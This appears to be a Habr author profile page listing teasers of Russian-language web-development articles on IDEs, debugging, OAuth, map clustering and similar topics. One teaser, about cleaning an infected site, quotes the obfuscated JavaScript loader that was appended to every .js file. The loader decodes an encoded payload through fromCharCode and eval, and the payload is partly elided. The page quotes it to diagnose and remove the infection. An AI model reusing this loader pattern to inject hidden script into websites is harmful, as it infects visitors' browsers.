Search
Write a publication
Pull to refresh
17
0
Daniel Newman @danielnewman

User

Send message

One Time Secret – после прочтения сжечь

Reading time3 min
Views15K

Если Вы когда-либо беспокоились, что данные, которые вы пересылаете по Сети (пароли, адреса, места встречи), могут быть перехвачены и сохранены злоумышленником, или просто не любите оставлять следы в Сети, то https://onetimesecret.com может вам помочь.

Данный сервис позволяет создавать одноразовые «секреты» — отправив секрет, вы получаете одноразовую ссылку на него, после перехода по которой секрет удаляется.
Некоторые подробности и бонус для хабравчан - ниже

Brackets — Open Source IDE для веб-разработки от Adobe

Reading time3 min
Views24K
Очередным редактором HTML, CSS и JavaScript, написанным на HTML, CSS и JavaScript сейчас никого не удивишь. Однако есть несколько причин, по которым стоит обратить внимание на пока ещё совсем зелёный и молодой проект Adobe Brackets. Во-первых, его делает Adobe. Поддержка такой крупной корпорации значит очень много. Во-вторых, Open Source бывает разный. В случае с Brackets это правильный, настоящий Open Source — уровень открытости весьма и весьма высок. Проект был опубликован на Github в начале мая этого года, несмотря на то, что он ещё в совершенно младенческом состоянии. Бэклог проекта тоже открыт для всех — разработка ведётся по методологии scrum спринтами по 2.5 недели. В-третьих — дизайн и архитектура этого IDE заслуживают более подробного рассказа.


Читать дальше →

Удаленная отладка с использованием xdebug port forwarding

Reading time2 min
Views20K
Каждый разработчик время от времени сталкивается с непонятными ошибками. Как правило, их причина неочевидна и чтобы их пофиксить, нужно детально понять, что происходит в коде. Модуль xdebug — инструмент для профессионального поиска ошибок. Когда выполнение кода доходит до точки останова, xdebug присоединяется к IDE, которая слушает порт (по умолчанию 9000). Эта схема хорошо работает на localhost. Если вы находитесь в прямой видимости удаленного сервера, то можно прописать в конфиге xdebug ваш ip, и производить отладку аналогично. Но если компьютер разработчика находится за NAT, то прямой доступ с сервера к нему невозможен.
Я давно использую xdebug на localhost, но, разобравшись с port forwarding, научился отлаживать на удаленном сервере и решил написать инструкцию, которая может быть полезной каждому разработчику, а главное — она работает.
В качестве IDE я использовал PhpStorm, браузер Chrome, ОС Ubuntu. Port forwarding без проблем работает и в windows.
Читать дальше →

Qbaka — сервис для отслеживания JS-ошибок

Reading time1 min
Views9.4K
Петербургские разработчики Андрей Мима (amima — ex-Яндекс, ex-ВКонтакте) и Даниил Гительсон (meta4) запустили сервис Qbaka, задачей которого является помощь программистам сайтов и приложений в отслеживании ошибок в коде JavaScript. Сервис пока находится в стадии бета-тестирования, однако уже открыт для всех желающих.

Сервис предельно прост в использовании: программист добавляет несколько строк JS-кода к своему веб-приложению — они асинхронно подгружают ядро «Кубаки», которое собирает ошибки (слушая window.onerror) и отправляет их на сервер.
Читать дальше →

Соглашение внутри команды

Reading time3 min
Views4K
Привет, у нас довольно большой поток разношерстных проектов. В какой-то момент нам пришла в голову светлая идея создать внутреннюю хартию ведения проектов, с которой соглашается каждый участник команды. Есть надежда, что это сократит издержки, увеличит качество и уменьшит количество неразберихи, позволит проще вводить новых «игроков» и вообще В качестве системы управления проектами выбрана Redmine, и надо сказать даже в default устанвоке эта штука правильно решает много вопросов за тебя: разделение на Ошибка\Улучшение, интеграция Git, лог действий, подпроекты, удобная Wiki и.т.д.
Наш вариант

Веб-разработчик и дизайнер Крис Койер собрал за 24 часа 25 000 $ на Kickstarter

Reading time2 min
Views8.2K
Понятно, что все уже устали от новостей про то, как очередная команда разработчиков собрала кучу денег на разработку римейка очередной классической игры. Сейчас речь пойдет немножко о другом — об относительно известной звезде фронтенда, веб-разработчике, CSS-евангелисте и авторе популярного сайта CSS-tricks.com Крисе Койере. Он решил собрать деньги на редизайн своего детища, причем сам процесс он хочет записать в виде обучающих скринкастов и предоставить их всем, кто поддержит его.

image

Буквально вчера он выложил на kickstarter.com проект следующего содержания (далее — перевод):
Читать дальше →

Исследование страниц веб-ресурсов высших учебных заведений

Reading time5 min
Views5.3K
Доброго времени суток, %username%. Хочу поделиться результатами своего исследования, которое проводилось на одном из этапов разработки дипломного проекта.

Введение


Так вышло, что в качестве дипломного проекта я получил разработку веб-ресурса учебного заведения. Основной сложностью для меня стало определение эскиза шаблонов страниц веб-ресурса, так как это был первый серьезный проект. Осложняло ситуацию и то, что ни я, ни заказчик не имели четкого представления о том, как эскиз будет выглядеть и с чего начинать его проектирование. Тогда нас и посетила мысль провести исследование страниц веб-ресурсов, чтобы получить схемы шаблонов, на основе которых в дальнейшем и будут строиться эскизы шаблонов разрабатываемого веб-ресурса.
Читать дальше →

Вирус Flame создавался специалистами США и Израиля с целью саботажа иранской ядерной программы

Reading time1 min
Views2.1K
Washington Post со ссылкой на неназванных западных чиновников сообщила о том, что шпионский вирус Flame разрабатывался совместно специалистами США и Израиля для получения информации, которая могла бы быть полезна в срыве иранской ядерной программы.
Читать дальше →

Медиазапросы и медиафича «view-mode» — это REC теперь

Reading time1 min
Views1.2K
И медиазапросы (Media Queries), и медиафича «view-mode» 19 июня официально стали стандартами, рекомендованными W3C (W3C Recommendation). Ура!

Медиазапросы: http://www.w3.org/TR/2012/REC-css3-mediaqueries-20120619/

Медиафича «view-mode»: http://www.w3.org/TR/2012/REC-view-mode-20120619/

Секунда координации (leap second) — что это такое и как «соломки» подстелить

Reading time4 min
Views12K
Как уже упоминалась на Хабре, 30 июня 2012 г. будет внесена секунда координации.
Если вам интересно, что это такое и какие неприятности может вызвать — добро пожаловать под кат.
Читать дальше →

OAuth на практике. Аутентификация и авторизация пользователей сайта через популярные социалки

Reading time14 min
Views347K
Думаю, не мне одному чрезвычайно надоели ресурсы, требующие регистрации по каждому поводу и без. С обязательной капчей, которая правильно введется только с пятого раза, с подтверждением по е-мейлу, которое обязательно свалится в спам и то — только через сутки. Придумывать каждый раз новую пару логин-пароль — забудется, вводить одно и то же на всех сайтах — небезопасно. Местами прокатывают пары вида «qwerty:qwerty» или «login:password», но, увы, далеко не везде. Надоело. Не счесть, сколько раз я, увидев надпись «только зарегистрированный пользователь может ****», просто кривился и закрывал вкладку, чтобы больше ни разу на этот сайт не заходить. Неужели администраторы ресурсов сами этого не понимают?
Читать дальше →

Кластеризация на клиенте или как показать 10000 точек на карте

Reading time7 min
Views31K
Существует несколько типов проектов,
для которых вывод геоинформации является
необходимым: сайты по недвижимости, каталоги компаний,
каталоги достопримечательностей, доски объявлений и другие.
Для этих сайтов я решил разработать плагин к goolge API 3 и Яндекс API 2.

Основные требования:
  1. Возможность подключения без глубокой подготовки данных на сервере, а именно, используя только уже имеющиеся географические координаты объектов.
  2. Простой протокол подготовки и передачи данных.
  3. Быстрый клиентский кластеризатор с ДВУМЯ типами меток: кластер и группа. Кластер — несколько объектов, расположенных рядом. При клике кластер “раскрывается”, то есть увеличивает зум пока объекты будут на расстоянии, большем чем расстояние кластеризации. Группа — несколько объектов в одной точке (на минимальном расстоянии). При клике на группу на любом зуме выводится список объектов в группе.
  4. Отображение до 10000 точек с использованием кластеризатора.
  5. Отображение в ie7, на мобильных устройствах (iPad первого поколения).
  6. Шаблонизация на клиенте двух инфоокон — группового кластера и самого объекта.
  7. Использование спрайта для меток.
  8. Возможность использования неограниченного количества типов меток (иконок) для разных типов объектов.
  9. Возможность использования нескольких размеров иконки для разного диапазона зума.

В статье я опишу несколько подходов, которые были использованы для реализации этого плагина.
Читать дальше →

Дайджест интересных новостей и материалов из мира айти за последнюю неделю №10 (9 — 15 июня 2012)

Reading time5 min
Views19K
Предлагаем вашему вниманию очередную подборку с ссылками на новости, интересные материалы и полезные ресурсы.


Читать дальше →

Обзор Mobile Safari iOS 6 для веб-разработчиков

Reading time4 min
Views12K

Уже было сказано довольно много слов про новую версию iOS и её бета-релиз. Однако, за кадром остались новые интересные возможности мобильной версии Safari о которых просто нельзя не рассказать. Но обо всём по порядку.

Данная статья изначально планировалась как перевод, но подготовленного материала хватило на самостоятельную статью. Для тестирования возможностей использовались iOS 6 beta 1 и Safari 6 developer preview for Mac. И то и другое доступно для скачивания для зарегистрированных разработчиков Apple.

Читать дальше →

GeoIP, попытки нетрадиционного использования

Reading time5 min
Views14K
Делать было вечером, делать было нечего...

Предыстория


В один прекрасный момент, случайно наткнулся на старый сервис, который позволяет вешать картинку на свой сайт, которая показывает географическое положение посетителей. Их много и разных.
Вещь сама по себе не такая уж полезная, мне как то данные awstats'а хватает за глаза.
Но для демонстрации посетителю, что он не случайный идиот прохожий забредший на мертвый сайт это дело подходит.
Дальше как и полагается раскинул мозгами на тему, а как же они это делают, разобрался и вроде успокоился…

Но больная голова покоя рукам не дает, так что сейчас я вам покажу один забавный и не несущий смысловую нагрузку эксперимент.
image
Это выборка всех возможных координат IP-шников (с округленные до целых).
Можно сказать, что это фотография интернета ареал обитания TCP/IP

Внимание, автор не является кодером в хорошем смысле этого слова, поэтому лиц, которых может шокировать копрокод прошу удалиться.
Читать дальше →

Лечение сайта от вируса в файлах javascript и других на примере

Reading time3 min
Views8.4K
Однажды, я получил письмо от Яндекс.Вебмастер о том, что один из моих сайтов заражён — Сайт содержит код, который может быть опасен для посетителей и, что В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера».

Быстрый анализ показал, что заражены файлы *.js — в конце каждого из них был добавлен код:

try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;}try{prototype;}catch(brebr){st=String;zz='al';zz='zv'.substr(123-122)+zz;ss=[];f='fr'+'om'+'Ch';f+='arC';f+='ode';w=this;e=w[f["substr"](11)+zz];n="19$50$57.5$54
.... тут ещё много таких же надписей ....
$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-685!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}


Проанализировав выдачу поисковика на тему поиска и замены текста в файлах linux, я получил несколько вариантов команд для консоли.

Далее, я зашёл в систему по SSH и от имени root выполнил команду
Читать дальше →

Очистка заражённых файлов сайта от вредоносного кода

Reading time8 min
Views32K
Добрый день, уважаемые Хабраюзеры!

Некоторое время назад, около месяца, на сервере нашей компании появился вирус. На одном из крупных проектов были поражены все *.js файлы. Ситуация обычная — в конец файлов был дописан вредоносный код. Яндекс выдавал предупреждение о заражении сайта и в техотдел пришло задание очистить его. Ситуация разрешилась достаточно быстро, проект был выгружен с чистого репозитория в продакшн, пароли сменили.

Однако вскоре со всех отделов компании в техотдел стали поступать жалобы о заражённых сайтах. Менеджерам жаловались клиенты, сеошники трубили что сайты теряют позиции. Началась настоящая эпидемия.
Читать дальше →

Создаем сайт с эффектом Parallax, используя Stellar.js

Reading time7 min
Views86K
Один из самых популярных трендов современного веб-дизайна является эффект Parallax. В этом туториале я покажу вам, как создать подобный эффект на вашем веб-сайте, используя воображение и Stellar.js.



Скачать исходники | Демо
Читать дальше →

Разработка сайтов с адаптивным дизайном

Reading time5 min
Views4.8K
Перевод статьи “Responsive workflow” финского веб-дизайнера и разработчика Вильями Салминена (Viljami Salminen).

На прошлой неделе я был на конференции Webshaped, где Стивен Хэй (Stephen Hay) рассказывал о процессе разработки адаптивного дизайна. Этот пост не совсем о том же самом, но подход Стивена напомнил мне мой собственный, поэтому я решил изложить некоторые мысли по этому поводу, описать как моя работа эволюционировала за прошедшие два или три года и как может измениться в будущем.

Читать дальше →

Information

Rating
Does not participate
Location
Иерусалим, Израиль
Date of birth
Registered
Activity